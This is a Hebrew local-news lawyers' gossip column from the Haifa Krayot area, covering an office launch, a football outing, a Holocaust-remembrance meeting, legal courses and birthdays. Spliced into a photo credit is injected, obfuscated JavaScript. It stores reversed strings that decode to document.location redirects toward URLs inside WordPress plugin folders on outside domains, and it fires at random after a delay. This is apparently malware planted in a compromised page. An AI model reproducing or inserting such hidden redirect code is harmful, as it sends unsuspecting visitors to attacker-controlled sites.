fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מי עשה קאמבק לקריות ומי קפא מקור בעיר הקודש?

מדור הפרקליטים של הד הקריות: האדווקט שדומה שתי טיפות מים ליול ברינר * המפגש המרגש בבית לוחמי הגטאות * הקטעים שרצו עם סמיון גרפמן * צילומי תדמית וחגיגות יום הולדת
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

* אחרי שנים ששימש עורך דין במשרד נ. פינברג ושות' ברמת גן, הנחשב לאחד המובילים בארץ בדיני עבודה, חזר עו"ד רועי סבג לקרית מוצקין, כדי להיות הכי קרוב למשפחה והשיק את משרדו החדש, המתמחה בייצוג מעסיקים בבתי הדין לעבודה ובתיקי ליטיגציה מורכבים לרבות סכסוכים קיבוציים. המדור יציין, כי בשנת 2012 קיבל עו״ד סבג את מגן שר הרווחה, כהוקרה על הקמת מפעל הזנה לחיילים בודדים והקמת פרויקטים רבים למען שכבות חלשות בחברה הישראלית.
עו"ד סבג, וולקאם.
"הרצון הטבעי להתקרב למשפחה גיבש בליבי ובעיקר בליבה של אשתי את ההבנה שאין מנוס מלשוב הביתה, צפונה. היעד המרכזי שלי בשנים הקרובות יהיה להפוך את משרדי לשם דבר בחיפה והצפון".

* את מי קלטו עיניו החדות של המדור באירוע ההשקה של המשרד החדש? סגן ראש עיריית חיפה דוד עציוני; יזם הנדל"ן יוסי כהן; איש העסקים, חבר מועצת העיר חיפה ויו"ר אתו"ס יעקב פיינגולד; שופטת בית משפט השלום בחיפה סיגלית גץ אופיר; שדר הרדיו גדי נס; איש התקשורת ואושיית הרשת יבגני זרובינסקי; איש העסקים משה בדש; עו"ד מיכל לביא ועוד. שיהיה בהצלחוש.

משיק את המשרד החדש. עו"ד רועי סבג | צילום: ג'ו הירש
משיק את המשרד החדש. עו"ד רועי סבג | צילום: ג'ו הירש

 

* בין החיפאים שלא נרתעו מאפס המעלות ששררו בשני השבוע בירושלים, המדור קלט ביציע הכבוד במשחק הכדורגל בין מכבי חיפה לבית"ר ירושלים את יועץ התקשורת של לשכת עורכי הדין במחוז יבגני זרובינסקי, זוגתו שתחיה מירי סדיק, ועוה"ד אדיר צבי ויריב רז שהוזמנו למשחק, על ידי – לא פחות ולא יותר – מבעלי בית"ר ירושלים משה חוגג.
סדיק, כמה שכבות לבשתם?
"בנס לא חזרנו עם דלקת ריאות".

ידעו ימים חמים יותר. מירי סדיק ויבגני זרובינסקי בירושלים צילום: עצמי
ידעו ימים חמים יותר. מירי סדיק ויבגני זרובינסקי בירושלים | צילום: עצמי

 

* מפגש מרגש נרשם בין סופי ספקטור, עורכת דין ומגשרת בדיני משפחה, עם האחיות צלילה והדסה באו, מנכ"ל בית לוחמי הגטאות יגאל כהן ומנהלת לוחמי הגטאות ציפי עדי נווה. על הפרק: רעיונות לשיתוף פעולה מעניין ומרגש לקראת יום השואה והגבורה. האחיות צלילה והדסה באו הן בנותיהם של רבקה ויוסף באו, מניצולי רשימת שינדלר, שהצילו אנשים רבים בתקופת השואה".
עו"ד ספקטור, איך היה?
"שמענו מהאחיות באו את הסיפור של הוריהם בשואה, בקרקוב, בגטו ובמחנה פלאשוב. תוך סיכון חייהם הם הצילו רבים. יוסף באו כגרפיקאי זייף מסמכים ותעודות, ורבקה באו עסקה בהצלת אנשים רבים בגטו ובמחנה פלאשוב, כולל עבודה עם אוסקר שינדלר על רשימת האנשים שנכנסו לרשימת ההצלה".
צלילה והדסה באו דיברו גם על משמעות היותן דור שני ועל השליחות שלקחו על עצמן להנצחת גבורתם ופעילותם של הוריהן במוזיאון שהקימו "בית יוסף באו" ובהרצאות שהן מעבירות בארץ ובחו"ל.

פגישה מרגשת. עו"ד סופי ספקטור עם האחיות באו, מנכ"ל לוחמי הגטאות יגאל כהו ומנהלת לוחמי הגטאות ציפי עדי נווה | צילום: עצמי
פגישה מרגשת. עו"ד סופי ספקטור עם האחיות באו, מנכ"ל לוחמי הגטאות יגאל כהו ומנהלת לוחמי הגטאות ציפי עדי נווה | צילום: עצמי

 

* שבוע עמוס בהרצאות עבר על יקיר המדור, עו"ד משה יונאי. בחמישי האחרון הוא הרצה במסגרת השתלמות לשכת עורכי הדין במחוז בנושא "פעולותיו וחובותיו של מנהל עיזבון". במוצאי שבת הוא הרצה בכפר ורדים, בפני קבוצת חברים מגובשת המגיעים מרמת הגולן, חיפה וקרית טבעון, בנושא "אל תיקח את החיים ברצינות – הרי לא תצא מהם חי" על צוואות וירושות.
עו"ד יונאי, החברים נהנו?
"פתחתי את ההרצאה בדבריו של גראוצ'ו מקס: 'מוות? זה הדבר האחרון שאני עומד לעשות!'. סיכמה את ההרצאה אחת החברות בקהל: 'כשהיינו צעירים יותר, שמענו הרצאות על חיי המין. עכשיו אנחנו שומעים על צוואות. בהמשך נזמין הרצאה על מצבות".

* איך מתמודדים עם חוות דעת רפואית מטעם התביעה, ההגנה ובית המשפט ומה קורה בתחום רשלנות רפואית בטיפולי שיניים? אלה הם רק חלק מהדברים עליהם למדו השבוע יותר מ-200 עורכי הדין בהשתלמות תעודה נוספת בתחום רשלנות רפואית בריכוזו האקדמי של עו"ד ערן בקר, המשנה ליו"ר ועד המחוז, יו"ר ועדת הנזיקין והביטוח המחוזית ויו"ר פורום ביטוח ארצי. את ההשתלמות פתח עו"ד בקר בדברים לזכרו של עו"ד אלי הכהן ז"ל, חבר פורום הנזיקין, שנפטר בטרם עת לאחר מאבק במחלה קשה. את ההרצאות העבירו עו"ד ענת מולסון וד"ר ערן פירט.

רשלנות רפואית. עו"ד ערן בקר | צילום: יח"צ
רשלנות רפואית. עו"ד ערן בקר | צילום: יח"צ

 

* אם ניסיתם לאחרונה להשיג את צמד האדווקטים גיל לוי ויניב לנקרי בימי רביעי אחר הצהריים ולא ממש הצלחתם, זה רק כי השניים נמצאים בקורס הייחודי של הכשרת בוררים של לשכת עורכי הדין.
עו"ד לנקרי, ממש כמו בסרטים.
"כן, רק בלי התאורה האפלה".

הכשרת בוררים. עוה"ד יניב לנקרי וגיל לוי | צילום: עצמי
הכשרת בוררים. עוה"ד יניב לנקרי וגיל לוי | צילום: עצמי

 

* לא רק משפטים: לשכת עורכי הדין במחוז תקיים בשבוע הבא, 19 בחודש, קורס החייאה במצבי חרום נשימתיים. בקורס ילמדו עורכי הדין החייאה בסיסית במבוגר, ילד ותינוק, שימוש בדפיברילטור אוטומטי, זיהוי וטיפול חירום שכיחים ועוד. יהיה מרתק, ושלא נצטרך.

* כוכב תוכנית "הצינור", סמיון גרפמן ("שבע שקל"), הגיע בשבוע שעבר לסקר פרויקט, עליו פיקחו משפטית עוה"ד אדיר צבי ויריב רז, והשניים זכו לראיון ארוך ומשעשע.
עו"ד רז, המדור, לצערו, לא היה זבוב על הקיר.
"לצערי, אני לא יכול לדבר על זה כרגע".

ראיון ארוך ומשעשע. סמיון גרפמן מראיין את עוה"ד אדיר צבי ויריב רז | צילום: יח"צ
ראיון ארוך ומשעשע. סמיון גרפמן מראיין את עוה"ד אדיר צבי ויריב רז | צילום: יח"צ

 

* מה המשותף בין עו"ד ומגשרת בדיני משפחה סופי ספקטור ועו"ד הולי שוורץ, שעוסקת בדיני הצבא וזכויות חיילים? ובכן, למדור הפתרונים. לכל אחת מהשתיים יש תוכנית רדיו, והפעם הן מתכננות שידור משותף ומרתק ביום הבחירות. אז רשמו ותנו פול ווליום: 3 במרס, 13:00-12:00 רדיו סול באינטרנט ובאפליקציה.

שידור משותף ביום הבחירות. עוה"ד סופי ספקטור והולי שוורץ | צילום: עצמי
שידור משותף ביום הבחירות. עוה"ד סופי ספקטור והולי שוורץ | צילום: עצמי

 

* בשבוע שעבר חל "שבוע הכפילים" בפייסבוק, מה שהעשיר את הפיד של כולנו בתמונות של חברים לצד תמונת סלבס שהם דומים להם. המדור לא יכול היה שלא להתעכב על הכפיל של עו"ד דור שוורץ, הלוא הוא השחקן והאגדה יול ברינר. המדור מצרף תמונות להמחשה. הפינה לשיפוטכם.

שבוע הכפילים. עו"ד דור שוורץ ויול ברינר | צילום: פייסבוק
שבוע הכפילים. עו"ד דור שוורץ ויול ברינר | צילום: פייסבוק

 

* ברביעי לפני שבועיים התקיימה תחרות הנואם הצעיר של רוטרי קישון. אחד השופטים בתחרות היה יקיר המדור, עו"ד משה יונאי, שעדכן את המדור כי במקום הראשון מבין תלמידי בתי הספר היסודיים זכה ירדן בארי מבית הספר גבעת רם בקריית אתא. בארי הצעיר דיבר על בעיית מחסור הרופאים בישראל ועל הכנסת מערכות ממוחשבות ורובוטיות לתחום רפואה. במקום השני זכה נועם בן אלטבל, גם הוא מבית הספר גבעת רם שדיבר על נגישות בבתי עסק, בתחבורה הציבורית ובבתי ספר לאנשים בעלי מוגבלויות. את המקום השלישי קטפה מאי סתתיה מבית הספר בגין מקרית מוצקין.
עו"ד יונאי, ברכות מהמדור לזוכים.
"יש לציין כי כל אחד מהנואמים הכין לבדו ובעצמו את הנאום ולמעשה חקר את הנושא, ואת תוצאות מחקרו ומסקנותיו הביא בפני הקהל. התחרות אורגנה על ידי חברי רוטרי קישון, אחד מ-60 מועדוני רוטרי במדינת ישראל, במסגרת תחרות ארצית".

תחרות הנואם הצעיר. ירדן בארי, נועם בן אלטבל, נשיאת מועדון רוטרי קישון, רות רוזן, מנהל בית הספר קדימה בקרית ביאליק, יוסי חלוואני, וחבר רוטרי קישון | צילום: יח"צ
תחרות הנואם הצעיר. ירדן בארי, נועם בן אלטבל, נשיאת מועדון רוטרי קישון, רות רוזן, מנהל בית הספר קדימה בקרית ביאליק, יוסי חלוואני, וחבר רוטרי קישון | צילום: יח"צ

 

* ברכת מזל טוב משוגרת בזאת לעו"ד עמירם אלקובי, שחגג 38 חורפים. צוות משרדו המסור ארגן לו הפתעה, כשהזמין לקוחות, עובדים וחברים מהעבר ומההווה ואף הכין לו מצגת מרגשת. כולם שרו הפי בירסדיי והיו גם עוגה ומבול של מתנות. רק בשמחות.

38 חורפים. עו"ד עמירם אלקובי | צילום: עצמי
38 חורפים. עו"ד עמירם אלקובי | צילום: עצמי

 

* ברכות לעו"ד לירן קולצ׳ינסקי, המתמחה בתחום האזרחי-מסחרי, ולעו"ד ליטל בר, המתמחה בתחום משפט אזרחי, חוזים, תביעות כספיות ודיני משפחה. השניים נכנסו לסטודיו של הצלם יקיר ברבי ולא יצאו משם לפני שהתחדשו בתמונות תדמית חדשות. שוס.

צילומי תדמית חדשים. עו"ד לירן קולצ׳ינסקי ועו"ד ליטל בר | צילומים: יקיר ברבי
צילומי תדמית חדשים. עו"ד לירן קולצ׳ינסקי ועו"ד ליטל בר | צילומים: יקיר ברבי

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות